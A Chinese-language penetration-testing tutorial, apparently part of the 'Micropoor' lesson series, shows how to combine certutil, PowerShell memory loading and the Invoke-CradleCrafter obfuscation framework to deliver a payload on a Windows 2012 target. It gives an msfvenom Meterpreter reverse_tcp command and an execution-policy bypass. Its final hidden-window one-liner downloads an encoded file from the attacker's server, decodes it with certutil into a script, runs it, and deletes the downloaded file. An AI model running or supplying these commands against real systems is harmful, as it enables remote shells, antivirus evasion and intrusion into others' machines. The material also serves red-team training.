# 第四十四课：ertutil一句话下载payload补充

第八季中提到了 certutil 的加密与解密。

```bash
C:\>certutil -encode c:\downfile.vbs downfile.bat
```

而配合 powershell 的内存加载，则可把 certutil 发挥更强大。

**靶机：windows 2012**

而今天需要的是一款 powershell 的混淆框架的配合\
<https://github.com/danielbohannon/Invoke-CradleCrafter>

使用方法：

```bash
Import-Module ./Invoke-CradleCrafter.psd1 Invoke-CradleCrafter
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsPpZUj5YNm9IAZ2%2Fc62807cec766f0f6c92c2d821cd6ede3.jpg?generation=1551060442722334\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsPrtqmvAVFp9Gsa%2F5fd8400f05ad1fe156649bb7d4ab2726.jpg?generation=1551060425703515\&alt=media)

如果在加载 powershell 脚本的时候提示：**powershell 进行数字签运行该脚本。** 则先执行：

```bash
set-executionpolicy Bypass
```

生成payload：（有关生成payload，会在未来的系列中讲到）

```bash
root@John:/tmp# msfvenom ‐p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=53 ‐e cmd/powershell_base64 ‐f psh ‐o Micropoor.txt
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsPtOwDDDWVo7tOP%2F316a532d526b20050d34d02f8f06e952.jpg?generation=1551060438451285\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsPvg1dFvXKOe0Mv%2Fcfa22fb95c6b008829035e91928f47db.jpg?generation=1551060428612795\&alt=media)

**启动apache：**\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsPx039TRnJZH_0v%2Fd34911ee8f5ed23aaef4fe39846d7c4d.jpg?generation=1551060441484131\&alt=media)

**powershell框架设置：**

SET URL <http://192.168.1.5/Micropoor.txt>\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsPzE5Vq7jUAzJe9%2Fbc3142653214ae8fd411b32efcdb77a8.jpg?generation=1551060437226915\&alt=media)

**MEMORY**\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsQ0hmogCGU_ZSFl%2F62d726b8feae58ada003965ac15cfe4a.jpg?generation=1551060438580290\&alt=media)

**CERTUTIL**\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsQ2LN6YM_7uJ1J1%2Fb700f3bfebafc44073df52b62d79d73c.jpg?generation=1551060450721865\&alt=media)

**ALL**\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsQ4BqYFKQhF1bvD%2F9b29ae29a5bf7fd27b9ded5b889844c4.jpg?generation=1551060429964653\&alt=media)

**1**\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsQ6snDobc5LO3Oj%2Ff14a65e3707c230527b14312400969e0.jpg?generation=1551060427494118\&alt=media)

**混淆内容保存txt，后进行encode**\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsQ8yOlLQ60HeJ_g%2F17b242fcc60d1fa5eb54d8f2c6268331.jpg?generation=1551060434077370\&alt=media)

把 cer.cer 与 Micropoo.txt 放置同一目录下。

**目标机执行：**

```bash
powershell.exe ‐Win hiddeN ‐Exec ByPasS add‐content ‐path %APPDATA%\\cer.cer (New‐Object Net.WebClient).DownloadString('http://192.168.1.5/cer.cer'); certutil ‐decode %APPDATA%\cer.cer %APPDATA%\stage.ps1 & start /b cmd /c powershell.exe ‐Exec Bypass ‐NoExit ‐File %APPDATA%\stage.ps1 & start /b cmd /c del %APPDATA%\cer.cer
```

> Micropoor